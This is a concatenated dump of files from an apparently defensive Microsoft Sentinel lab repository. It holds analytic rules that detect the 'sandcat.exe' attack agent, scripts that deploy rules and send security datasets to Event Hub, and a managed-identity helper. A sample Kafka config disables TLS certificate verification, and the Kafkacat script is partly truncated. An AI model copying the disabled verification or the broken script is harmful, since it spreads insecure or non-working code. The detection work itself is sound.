https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_mk_dcsync_execution.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_query_rpcfirewall_limit10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_query_rpcfirewall_limit10.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_query_rpcfirewall_where_replication.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_query_rpcfirewall_where_replication.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_update_rules.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_update_rules.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_windows_subscriptions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_windows_subscriptions.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_windows_subscriptions_queries.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_windows_subscriptions_queries.png -------------------------------------------------------------------------------- /resources/samples/analytic-rules/sandcats.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "kind": "Scheduled", 4 | "properties": { 5 | "alertRuleTemplateName": null, 6 | "description": "Basic internal rule to detect binary named sandcat.exe", 7 | "displayName": "Sandcat Execution", 8 | "enabled": true, 9 | "incidentConfiguration": { 10 | "createIncident": true, 11 | "groupingConfiguration": { 12 | "enabled": false, 13 | "entitiesMatchingMethod": "All", 14 | "groupByEntities": [], 15 | "lookbackDuration": "PT5H", 16 | "reopenClosedIncident": false 17 | } 18 | 
}, 19 | "query": "SecurityEvent | where EventID == \"4688\" and CommandLine contains \"sandcat.exe\"", 20 | "queryFrequency": "PT5M", 21 | "queryPeriod": "PT5M", 22 | "queryResultsAggregationSettings": { 23 | "aggregationKind": "SingleAlert" 24 | }, 25 | "severity": "High", 26 | "suppressionDuration": "PT5H", 27 | "suppressionEnabled": false, 28 | "tactics": [ 29 | "Execution" 30 | ], 31 | "triggerOperator": "Equal", 32 | "triggerThreshold": 1 33 | } 34 | }, 35 | { 36 | "kind": "Scheduled", 37 | "properties": { 38 | "alertRuleTemplateName": null, 39 | "description": "Basic internal rule to detect binary named sandcat.exe", 40 | "displayName": "Sandcat Network", 41 | "enabled": true, 42 | "incidentConfiguration": { 43 | "createIncident": true, 44 | "groupingConfiguration": { 45 | "enabled": false, 46 | "entitiesMatchingMethod": "All", 47 | "groupByEntities": [], 48 | "lookbackDuration": "PT5H", 49 | "reopenClosedIncident": false 50 | } 51 | }, 52 | "query": "AzureDiagnostics | where EventID == \"4688\" and CommandLine contains \"sandcat.exe\"", 53 | "queryFrequency": "PT5M", 54 | "queryPeriod": "PT5M", 55 | "queryResultsAggregationSettings": { 56 | "aggregationKind": "SingleAlert" 57 | }, 58 | "severity": "High", 59 | "suppressionDuration": "PT5H", 60 | "suppressionEnabled": false, 61 | "tactics": [ 62 | "Execution" 63 | ], 64 | "triggerOperator": "Equal", 65 | "triggerThreshold": 1 66 | } 67 | }, 68 | { 69 | "kind": "Scheduled", 70 | "properties": { 71 | "alertRuleTemplateName": null, 72 | "description": "Basic internal rule to detect binary named sandcat.exe", 73 | "displayName": "Sandcat Network", 74 | "enabled": true, 75 | "incidentConfiguration": { 76 | "createIncident": true, 77 | "groupingConfiguration": { 78 | "enabled": false, 79 | "entitiesMatchingMethod": "All", 80 | "groupByEntities": [], 81 | "lookbackDuration": "PT5H", 82 | "reopenClosedIncident": false 83 | } 84 | }, 85 | "query": "SecurityEvent | where EventID == \"4688\" and CommandLine contains 
\"sandcat.exe\"", 86 | "queryFrequency": "PT5M", 87 | "queryPeriod": "PT5M", 88 | "queryResultsAggregationSettings": { 89 | "aggregationKind": "SingleAlert" 90 | }, 91 | "severity": "High", 92 | "suppressionDuration": "PT5H", 93 | "suppressionEnabled": false, 94 | "tactics": [ 95 | "Execution" 96 | ], 97 | "triggerOperator": "Equal", 98 | "triggerThreshold": 1 99 | } 100 | } 101 | ] 102 | -------------------------------------------------------------------------------- /resources/samples/data/dataset-sample-one.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/samples/data/dataset-sample-one.tar.gz -------------------------------------------------------------------------------- /resources/samples/data/dataset-sample-small.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/samples/data/dataset-sample-small.tar.gz -------------------------------------------------------------------------------- /resources/samples/data/dataset-sample-two.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/samples/data/dataset-sample-two.tar.gz -------------------------------------------------------------------------------- /resources/samples/kafkacat/kafkacat-Example.conf: -------------------------------------------------------------------------------- 1 | metadata.broker.list=.servicebus.windows.net:9093 2 | security.protocol=SASL_SSL 3 | sasl.mechanisms=PLAIN 4 | sasl.username=$ConnectionString 5 | sasl.password= 6 | enable.ssl.certificate.verification=false 7 | message.max.bytes=1000000 8 | 
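-------------------------------------------------------------------------------- /resources/scripts/Convert-AnalyticRules.py: --------------------------------------------------------------------------------
#!/usr/bin/env python3

# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:
# https://stackoverflow.com/questions/38620471/json-dumps-u-escaped-unicode-to-utf8

import glob
import json
import yaml
import argparse
import os
from tqdm import tqdm
from time import sleep
import sys
import logging

# Initial description
text = "This script translates analytic rules from https://github.com/Azure/Azure-Sentinel/tree/master/Detections to JSON files"
example_text = f'''examples:

python3 {sys.argv[0]} -f detections/SecurityEvent/ExcessiveLogonFailures.yaml -o folder/
python3 {sys.argv[0]} -f detections/ -o folder/
'''

# Initiate the parser
parser = argparse.ArgumentParser(description=text, epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)

# Add arguments (store_true means no argument needed)
parser.add_argument('-f', "--file-path", nargs='+', help="Path of YAML file(s) or folder(s) of YAML files", required=True)
parser.add_argument('-o', "--output-path", type=str, help="Folder path to output JSON files", required=True)
parser.add_argument("-d", "--debug", help="Print lots of debugging statements", action="store_const", dest="loglevel", const=logging.DEBUG, default=logging.WARNING)
parser.add_argument("-v", "--verbose", help="Be verbose", action="store_const", dest="loglevel", const=logging.INFO)

args = parser.parse_args()

logging.basicConfig(level=args.loglevel)
log = logging.getLogger(__name__)

# Sentinel detection YAML trigger operators -> AlertTriggerOperator values expected by the alertRules API.
# Values not in the table are passed through unchanged.
TRIGGER_OPERATORS = {
    "gt": "GreaterThan",
    "lt": "LessThan",
    "eq": "Equal",
    "ne": "NotEqual",
}


def to_iso8601_duration(value: str) -> str:
    """Convert a detection YAML duration ('5m', '1h', '1d', '1d12h') to ISO 8601.

    ISO 8601 durations are PdDThHmMsS: 'P' starts the designator, 'T' separates
    the date part (days) from the time part (hours/minutes/seconds).
    '5M' -> 'PT5M', '1D' -> 'P1D', '1D12H' -> 'P1DT12H'.

    Args:
        value: duration string, case-insensitive.
    Returns:
        The ISO 8601 duration string.
    """
    value = value.strip().upper()
    if "D" in value:
        days, _, time_part = value.partition("D")
        # Anything after the day count belongs in the time part, behind a 'T'.
        return f"P{days}D" + (f"T{time_part}" if time_part else "")
    return f"PT{value}"


def collect_yaml_files(paths: list[str]) -> list[str]:
    """Expand the -f arguments into one flat list of YAML file paths.

    Files are taken as given; directories are searched recursively for *.yaml.

    Args:
        paths: absolute file or directory paths.
    Returns:
        All YAML paths, in argument order.
    Raises:
        SystemExit: when a path is neither a file nor a directory.
    """
    all_files = []
    for path in paths:
        if os.path.isfile(path):
            all_files.append(path)
        elif os.path.isdir(path):
            # extend, not assign: assigning here discarded the files gathered from earlier arguments
            all_files.extend(glob.glob(f"{path}/**/*.yaml", recursive=True))
        else:
            log.error(f"{path} is neither a file nor a directory")
            sys.exit(1)
    return all_files


def convert_rule(rule: dict) -> dict:
    """Rewrite a loaded detection YAML document into the Scheduled alertRules API shape.

    Args:
        rule: the YAML document as a dict; it is modified in place.
    Returns:
        {'kind': 'Scheduled', 'properties': rule}.
    Raises:
        KeyError: when 'name', 'queryFrequency' or 'queryPeriod' is missing.
    """
    # The YAML 'id' is not an API property (the rule id is the resource name in the PUT URL).
    rule.pop("id", None)
    # Key 'name' becomes 'displayName'
    rule["displayName"] = rule.pop("name")
    # Deploy the rule enabled
    rule["enabled"] = True
    # Durations in ISO 8601 format
    rule["queryFrequency"] = to_iso8601_duration(rule["queryFrequency"])
    rule["queryPeriod"] = to_iso8601_duration(rule["queryPeriod"])
    # Trigger operator in the API's AlertTriggerOperator form
    operator = rule.get("triggerOperator")
    if isinstance(operator, str):
        rule["triggerOperator"] = TRIGGER_OPERATORS.get(operator.strip().lower(), operator)
    # Suppression defaults
    rule["suppressionDuration"] = "PT5H"
    rule["suppressionEnabled"] = False
    return {"kind": "Scheduled", "properties": rule}


# Set output path
output_path = os.path.abspath(args.output_path)

# Aggregate files from Input Paths
input_paths = [os.path.abspath(path) for path in args.file_path]
all_files = collect_yaml_files(input_paths)

# Initializing outer progress bar
outer = tqdm(total=len(all_files), desc='Files', position=0)

# Initialize All AnalyticRules list
allAnalyticRules = list()

# Process all YAML File(s)
for analytic in all_files:
    log.info(f'Started to process {analytic}')

    analytic_filename = os.path.splitext(os.path.basename(analytic))[0]
    analytic_folder_name = os.path.basename(os.path.dirname(analytic))

    # Create folder if it does not exist
    rule_output_dir = os.path.join(output_path, analytic_folder_name)
    os.makedirs(rule_output_dir, exist_ok=True)

    # safe_load: the YAML comes from a third-party repository, never use yaml.load on it
    with open(analytic, encoding="utf-8") as f:
        analytic_load = yaml.safe_load(f)

    try:
        analytic_dict = convert_rule(analytic_load)
    except (KeyError, AttributeError, TypeError) as exc:
        # A malformed rule is reported and skipped instead of aborting the whole batch.
        log.error(f"Skipping {analytic}: {exc!r}")
        outer.update(1)
        continue

    # write to file
    with open(os.path.join(rule_output_dir, f"{analytic_filename}.json"), 'w', encoding="utf-8") as f:
        json.dump(analytic_dict, f, indent=4)

    # Add to All AnalyticRules list
    allAnalyticRules.append(analytic_dict)
    outer.update(1)

# write allAnalyticRules to allAnalyticRules.json
with open(os.path.join(output_path, 'allAnalyticRules.json'), 'w', encoding="utf-8") as f:
    json.dump(allAnalyticRules, f, indent=4)
-------------------------------------------------------------------------------- /resources/scripts/Get-AnalyticRules.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: 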
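GPL-3.0

# Reference:
# https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-rest
# https://github.com/Azure/Azure-Security-Center/tree/master/Powershell%20scripts/Security%20Event%20collection%20tier
# https://medium.com/@mauridb/calling-azure-rest-api-via-curl-eb10a06127

# Lists the Microsoft Sentinel analytic (alert) rules of a Log Analytics workspace through the
# ARM REST API, with the credentials of the current "az login" session.

set -e

script_name=$0

usage(){
    echo "Usage: ${script_name} -s [Subscription Id]"
    echo "       -r [Resource group name]"
    echo "       -w [Log Analytics Workspace Name]"
    exit 1
}

# Leading ':' puts getopts in silent mode, so missing arguments (':') and unknown
# options ('?') are reported here instead of being printed by getopts and ignored.
while getopts :s:r:w:h opt; do
    case "$opt" in
        s) SUBSCRIPTION_ID=$OPTARG;;
        r) RESOURCE_GROUP_NAME=$OPTARG;;
        w) WORKSPACE_NAME=$OPTARG;;
        h) usage;;
        :) echo "Option -$OPTARG requires an argument" >&2; usage;;
        \?) echo "Invalid option: -$OPTARG" >&2; usage;;
    esac
done

shift $((OPTIND-1))
[ "$1" = "--" ] && shift

if [ -z "$RESOURCE_GROUP_NAME" ] || [ -z "$WORKSPACE_NAME" ]; then
    usage
else
    # az rest resolves the literal {subscriptionId} token to the active account's subscription,
    # so -s is only needed to target a different one.
    if [ "$SUBSCRIPTION_ID" ]; then
        az rest -m get -u "https://management.azure.com/subscriptions/${SUBSCRIPTION_ID}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/providers/Microsoft.SecurityInsights/alertRules?api-version=2019-01-01-preview" --verbose
    else
        az rest -m get -u "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/providers/Microsoft.SecurityInsights/alertRules?api-version=2019-01-01-preview" --verbose
    fi
fi
-------------------------------------------------------------------------------- /resources/scripts/Get-DataConnectors.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | # Reference: 7 | # https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-rest 8 | # 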
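https://github.com/Azure/Azure-Security-Center/tree/master/Powershell%20scripts/Security%20Event%20collection%20tier
# https://medium.com/@mauridb/calling-azure-rest-api-via-curl-eb10a06127

# Lists the Microsoft Sentinel data connectors of a Log Analytics workspace through the
# ARM REST API, with the credentials of the current "az login" session.

set -e

script_name=$0

usage(){
    echo "Usage: ${script_name} -s [Subscription Id]"
    echo "       -r [Resource group name]"
    echo "       -w [Log Analytics Workspace Name]"
    exit 1
}

# Leading ':' puts getopts in silent mode, so missing arguments (':') and unknown
# options ('?') are reported here instead of being printed by getopts and ignored.
while getopts :s:r:w:h opt; do
    case "$opt" in
        s) SUBSCRIPTION_ID=$OPTARG;;
        r) RESOURCE_GROUP_NAME=$OPTARG;;
        w) WORKSPACE_NAME=$OPTARG;;
        h) usage;;
        :) echo "Option -$OPTARG requires an argument" >&2; usage;;
        \?) echo "Invalid option: -$OPTARG" >&2; usage;;
    esac
done

shift $((OPTIND-1))
[ "$1" = "--" ] && shift

if [ -z "$RESOURCE_GROUP_NAME" ] || [ -z "$WORKSPACE_NAME" ]; then
    usage
else
    # az rest resolves the literal {subscriptionId} token to the active account's subscription,
    # so -s is only needed to target a different one.
    if [ "$SUBSCRIPTION_ID" ]; then
        az rest -m get -u "https://management.azure.com/subscriptions/${SUBSCRIPTION_ID}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/providers/Microsoft.SecurityInsights/dataConnectors/?api-version=2020-01-01" --verbose
    else
        az rest -m get -u "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/providers/Microsoft.SecurityInsights/dataConnectors/?api-version=2020-01-01" --verbose
    fi
fi
-------------------------------------------------------------------------------- /resources/scripts/Get-DataSources.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | # Reference: 7 | # https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-rest 8 | # https://github.com/Azure/Azure-Security-Center/tree/master/Powershell%20scripts/Security%20Event%20collection%20tier 9 | # 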
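https://medium.com/@mauridb/calling-azure-rest-api-via-curl-eb10a06127

# Lists the data sources of a Log Analytics workspace through the ARM REST API,
# with the credentials of the current "az login" session.

set -e

script_name=$0

usage(){
    echo "Usage: ${script_name} -s [Subscription Id]"
    echo "       -r [Resource group name]"
    echo "       -w [Log Analytics Workspace Name]"
    exit 1
}

# Leading ':' puts getopts in silent mode, so missing arguments (':') and unknown
# options ('?') are reported here instead of being printed by getopts and ignored.
while getopts :s:r:w:h opt; do
    case "$opt" in
        s) SUBSCRIPTION_ID=$OPTARG;;
        r) RESOURCE_GROUP_NAME=$OPTARG;;
        w) WORKSPACE_NAME=$OPTARG;;
        h) usage;;
        :) echo "Option -$OPTARG requires an argument" >&2; usage;;
        \?) echo "Invalid option: -$OPTARG" >&2; usage;;
    esac
done

shift $((OPTIND-1))
[ "$1" = "--" ] && shift

if [ -z "$RESOURCE_GROUP_NAME" ] || [ -z "$WORKSPACE_NAME" ]; then
    usage
else
    if [ "$SUBSCRIPTION_ID" ]; then
        # "$filter" has to reach the API literally: unescaped inside double quotes the shell expanded
        # it to an empty string and the query became "?=kind=...", which silently filtered nothing.
        # The OData comparison operator is "eq" (as in the WindowsEvent example below).
        az rest -m get -u "https://management.azure.com/subscriptions/${SUBSCRIPTION_ID}/resourcegroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/dataSources?\$filter=kind eq 'LinuxSyslogCollection'&api-version=2015-11-01-preview"
        #az rest -m get -u "https://management.azure.com/subscriptions/${SUBSCRIPTION_ID}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/datasources?\$filter=kind eq 'WindowsEvent'&api-version=2015-11-01-preview" --verbose
    else
        # NOTE(review): the trailing "/read" segment looks like an ARM operation name rather than a URL path
        # segment, and this branch passes no $filter; confirm against the DataSources API before relying on it.
        az rest -m get -u "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/datasources/read?api-version=2015-11-01-preview" --verbose
    fi
fi
-------------------------------------------------------------------------------- /resources/scripts/Kafkacat-Mordor-Eventhub.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | usage(){ 7 | echo " " 8 | echo "Usage: $0 [option...]" >&2 9 | echo 10 | echo " -n EventHub Namespace" 11 | echo " -c EventHub Connection String Primary" 12 | echo " 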
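-e EventHub name"
    echo
    echo "Examples:"
    # NOTE(review): the rest of usage() and the whole option-parsing loop (original lines 15-30) did not
    # survive in this copy of the file; the fragment on the next line is what remains of them. Restore
    # them from upstream before running this script.
    echo " $0 -n -c -e &2; exit 1;; 31 | * ) echo "Unimplemented option: -$OPTARG" >&2; exit 1;;
    esac
done

if ((OPTIND == 1))
then
    echo "No options specified"
    usage
fi

# ****** Installing latest kafkacat
if [ -x "$(command -v kafkacat)" ]; then
    echo "removing kafkacat.."
    apt-get remove --auto-remove -y kafkacat
fi

echo "Installing Kafkacat.."
wget https://github.com/edenhill/kafkacat/archive/debian/1.4.0-1.tar.gz
# Optional integrity check of the downloaded source archive. Export KAFKACAT_SHA256 with the expected
# digest of 1.4.0-1.tar.gz (e.g. KAFKACAT_SHA256=<expected sha256>, constructed placeholder) to enforce it;
# without it the archive is built as downloaded, as before.
if [ -n "${KAFKACAT_SHA256}" ]; then
    echo "${KAFKACAT_SHA256}  1.4.0-1.tar.gz" | sha256sum -c - || { echo "Checksum mismatch for 1.4.0-1.tar.gz" >&2; exit 1; }
fi
tar -xzvf 1.4.0-1.tar.gz
apt install -y librdkafka-dev libyajl-dev build-essential libsasl2-dev libsasl2-modules libssl-dev
cd kafkacat-debian-1.4.0-1/ && ./bootstrap.sh
cp kafkacat /usr/local/bin/

echo "Installing Git.."
apt install -y git

echo "Cloning Security Datasets repo.."
git clone https://github.com/OTRF/Security-Datasets.git

echo "Decompressing every small security dataset.."
cd Security-Datasets/datasets/small/
find . -type f -name "*.tar.gz" -print0 | xargs -0 -I{} tar xf {} -C .

echo "Sending every dataset to Azure Event Hub"
filescount=$(find . -maxdepth 1 -type f -name "*.json" -printf x | wc -c)
count=0
for dataset in *.json; do
    count=$(($count + 1))
    echo "($count of $filescount) Sending $dataset .."
    # SASL PLAIN carries the Event Hub connection string (a secret) as the password, so the broker
    # certificate must be verified; verification stays on (the librdkafka default). Set
    # -X ssl.ca.location=<ca bundle> if the client cannot find a trust store on its own.
    kafkacat -b ${EVENTHUB_NAMESPACE}.servicebus.windows.net:9093 -t ${EVENTHUB_NAME} -X metadata.broker.list=${EVENTHUB_NAMESPACE}.servicebus.windows.net:9093 -X security.protocol=sasl_ssl -X sasl.mechanisms=PLAIN -X sasl.username=\$ConnectionString -X sasl.password="${EVENTHUB_CONNECTIONSTRING}" -X enable.ssl.certificate.verification=true -X message.max.bytes=1000000 -P -v -l "$dataset"
    sleep 5
done
-------------------------------------------------------------------------------- /resources/scripts/New-ManagedIdentity.ps1: -------------------------------------------------------------------------------- 1 | function New-ManagedIdentity { 2 | <# 3 | .SYNOPSIS 4 | A PowerShell wrapper around the Azure CLI "az identity" command to create a user assigned managed identity. 5 | 6 | Author: Roberto Rodriguez (@Cyb3rWard0g) 7 | License: MIT 8 | Required Dependencies: Azure CLI 9 | Optional Dependencies: None 10 | 11 | .DESCRIPTION 12 | New-ManagedIdentity is a simple PowerShell wrapper around the Azure CLI "az identity" command to create a user assigned managed identity. 13 | 14 | .PARAMETER Name 15 | The name of the new user assigned managed identity. 16 | 17 | .PARAMETER ResourceGroup 18 | The name of the resource group to verify if managed identity exists in. 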

.LINK
https://docs.microsoft.com/en-us/azure/active-directory/managed-identities-azure-resources/how-manage-user-assigned-managed-identities?pivots=identity-mi-methods-azp
https://docs.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=dotnet
#>

    [cmdletbinding()]
    Param(
        [parameter(Mandatory = $True)]
        [String] $Name,

        [parameter(Mandatory = $True)]
        [String] $ResourceGroup
    )

    # Make sure an Azure CLI session exists; sign in interactively when there is none,
    # otherwise show whose context the identity will be created under.
    $currentUser = az ad signed-in-user show --query '[displayName, mail]' | ConvertFrom-Json
    if (-not $currentUser) {
        az login
    }
    else {
        Write-Host "[+] Using the following user context:"
        Write-Host "[+] UserName: $($currentUser[0])"
        Write-Host "[+] E-mail: $($currentUser[1])"
    }

    # Quotes are stripped before the name is interpolated into the JMESPath --query expression.
    $Name = $Name.Trim() -replace "['`"]", ""
    $existing = $(az identity list --query "[?name=='$Name']" --resource-group $ResourceGroup | ConvertFrom-Json)[0]
    if ($existing) {
        Write-Host "[!] User assigned identity $Name already exists!"
        return
    }

    Write-Host "[+] Creating User Assigned Managed Identity: $Name"
    $created = az identity create -g $ResourceGroup -n $Name | ConvertFrom-Json
    if (-not $created) {
        Write-Host "[!] User assigned identity was not created."
        return
    }

    Write-Host "[+] User assigned managed identity was created successfully!"
    <#
    Shape of the object returned by "az identity create":
    clientId        : CLIENTID
    clientSecretUrl : https://control-eastus.identity.azure.net/subscriptions/SUBSCRIPTIONID/resourcegroups/apps/providers/
                      Microsoft.ManagedIdentity/userAssignedIdentities/IDENTITYNAME/credentials?tid=TENANTID&oid=PRINCIPALID&aid=CLIENTID
    id              : /subscriptions/SUBSCRIPTIONID/resourcegroups/apps/providers/Microsoft.ManagedIdentity/userAssignedIdentities/IDENTITYNAME
    location        : eastus
    name            : IDENTITYNAME
    principalId     : PRINCIPALID
    resourceGroup   : apps
    tags            :
    tenantId        : TENANTID
    type            : Microsoft.ManagedIdentity/userAssignedIdentities
    #>
    # The identity object is the function's output.
    $created
}
-------------------------------------------------------------------------------- /resources/scripts/Post-AnalyticRules.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | # Reference: 7 | # https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-rest 8 | # https://github.com/Azure/Azure-Security-Center/tree/master/Powershell%20scripts/Security%20Event%20collection%20tier 9 | # https://medium.com/@mauridb/calling-azure-rest-api-via-curl-eb10a06127 10 | # https://oncletom.io/2016/pipelining-http/ 11 | # https://starkandwayne.com/blog/bash-for-loop-over-json-array-using-jq/ 12 | # https://cameronnokes.com/blog/working-with-json-in-bash-using-jq/ 13 | 14 | set -e 15 | 16 | script_name=$0 17 | 18 | usage(){ 19 | echo "Invalid option: -$OPTARG" 20 | echo "Usage: ${script_name} -r " 21 | echo " -w " 22 | exit 1 23 | } 24 | 25 | while getopts r:w:h opt; do 26 | case "$opt" in 27 | r) RESOURCE_GROUP_NAME=$OPTARG;; 28 | w) WORKSPACE_NAME=$OPTARG;; 29 | h) #Show help 30 | usage 31 | exit 2 32 | ;; 33 | esac 34 | done 35 | 36 | shift $((OPTIND-1)) 37 | [ "$1" = "--" ] && shift 38 | 39 | if [ 
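-z "$RESOURCE_GROUP_NAME" ] || [ -z "$WORKSPACE_NAME" ]; then
    usage
else
    SYSTEM_KERNEL="$(uname -s)"
    # Source of the rules that get written into the workspace. The default follows the master branch,
    # so the deployed set can change between runs; set RULES_URL to a commit-pinned raw URL for a
    # reproducible deployment.
    RULES_URL="${RULES_URL:-https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/master/microsoft-sentinel/analytic-rules/allAnalyticRules.json}"
    for row in $(curl -sS "${RULES_URL}" | jq -r '.[] | @base64'); do
        # Reset per rule; "$?" here only reflected whatever ran before the loop.
        return_code=0
        # Generating GUID for analytic rule Id (it becomes the alertRules/{id} resource name)
        if [ "$SYSTEM_KERNEL" == "Linux" ]; then
            name=$(cat /proc/sys/kernel/random/uuid)
        elif [ "$SYSTEM_KERNEL" == "Darwin" ]; then
            name=$(uuidgen)
        else
            # Any other platform: $name must never be empty, or the PUT would target ".../alertRules/" itself
            name=$(uuidgen)
        fi
        # Getting analytic rule name
        # NOTE(review): ${1} is the first non-option argument and is normally empty, so jq gets
        # ".properties.displayName" / no filter; confirm this is intended rather than a literal ".".
        ruleName=$(echo ${row} | base64 -d | jq -r ${1}.properties.displayName)
        # Posting analytic rule to Azure Sentinel's workspace
        echo -e "\n[+] Analytic Rule: $ruleName"
        echo ${row} | base64 -d | jq -r ${1} | az rest -m put -u "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/providers/Microsoft.SecurityInsights/alertRules/${name}?api-version=2019-01-01-preview" --body @- --verbose || return_code=$?
        # Handling error
        if [ "$return_code" != "0" ] && [ "$return_code" ]; then
            RED='\033[0;31m'
            NC='\033[0m'
            echo -e "${RED}[!] Creation of analytic rule failed.."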
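61 | echo ${row} | base64 -d | jq -Mr ${1} 62 | echo -e "${NC}" 63 | fi 64 | sleep 1 65 | done 66 | fi 67 | -------------------------------------------------------------------------------- /resources/scripts/Post-AnalyticRules_Backup.sh: --------------------------------------------------------------------------------
#!/bin/bash

# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# Reference:
# https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-rest
# https://github.com/Azure/Azure-Security-Center/tree/master/Powershell%20scripts/Security%20Event%20collection%20tier
# https://medium.com/@mauridb/calling-azure-rest-api-via-curl-eb10a06127
# https://oncletom.io/2016/pipelining-http/
# https://starkandwayne.com/blog/bash-for-loop-over-json-array-using-jq/
# https://cameronnokes.com/blog/working-with-json-in-bash-using-jq/

# Variant of Post-AnalyticRules.sh that deploys rules from a local JSON file instead of the
# copy published on GitHub.

set -e

script_name=$0

usage(){
    echo "Usage: ${script_name} -r [Resource group name]"
    echo "       -w [Log Analytics Workspace Name]"
    exit 1
}

# Leading ':' puts getopts in silent mode, so missing arguments (':') and unknown
# options ('?') are reported here instead of being printed by getopts and ignored.
while getopts :r:w:h opt; do
    case "$opt" in
        r) RESOURCE_GROUP_NAME=$OPTARG;;
        w) WORKSPACE_NAME=$OPTARG;;
        h) usage;;
        :) echo "Option -$OPTARG requires an argument" >&2; usage;;
        \?) echo "Invalid option: -$OPTARG" >&2; usage;;
    esac
done

shift $((OPTIND-1))
[ "$1" = "--" ] && shift

if [ -z "$RESOURCE_GROUP_NAME" ] || [ -z "$WORKSPACE_NAME" ]; then
    usage
else
    SYSTEM_KERNEL="$(uname -s)"
    # Local rules file; override with RULES_FILE. The GitHub copy used by Post-AnalyticRules.sh is kept for reference:
    #for row in $(curl -sS https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/master/microsoft-sentinel/analytic-rules/allAnalyticRules.json | jq -r '.[] | @base64'); do
    RULES_FILE="${RULES_FILE:-../samples/analytic-rules/sandcats.json}"
    for row in $(jq -r '.[] | @base64' "${RULES_FILE}"); do
        # Reset per rule; "$?" here only reflected whatever ran before the loop.
        return_code=0
        # Generating GUID for analytic rule Id (it becomes the alertRules/{id} resource name)
        if [ "$SYSTEM_KERNEL" == "Linux" ]; then
            name=$(cat /proc/sys/kernel/random/uuid)
        elif [ "$SYSTEM_KERNEL" == "Darwin" ]; then
            name=$(uuidgen)
        else
            # Any other platform: $name must never be empty, or the PUT would target ".../alertRules/" itself
            name=$(uuidgen)
        fi
        # Getting analytic rule name
        # NOTE(review): ${1} is the first non-option argument and is normally empty; confirm this is intended rather than a literal ".".
        ruleName=$(echo ${row} | base64 -d | jq -r ${1}.properties.displayName)
        # Posting analytic rule to Azure Sentinel's workspace
        echo -e "\n[+] Analytic Rule: $ruleName"
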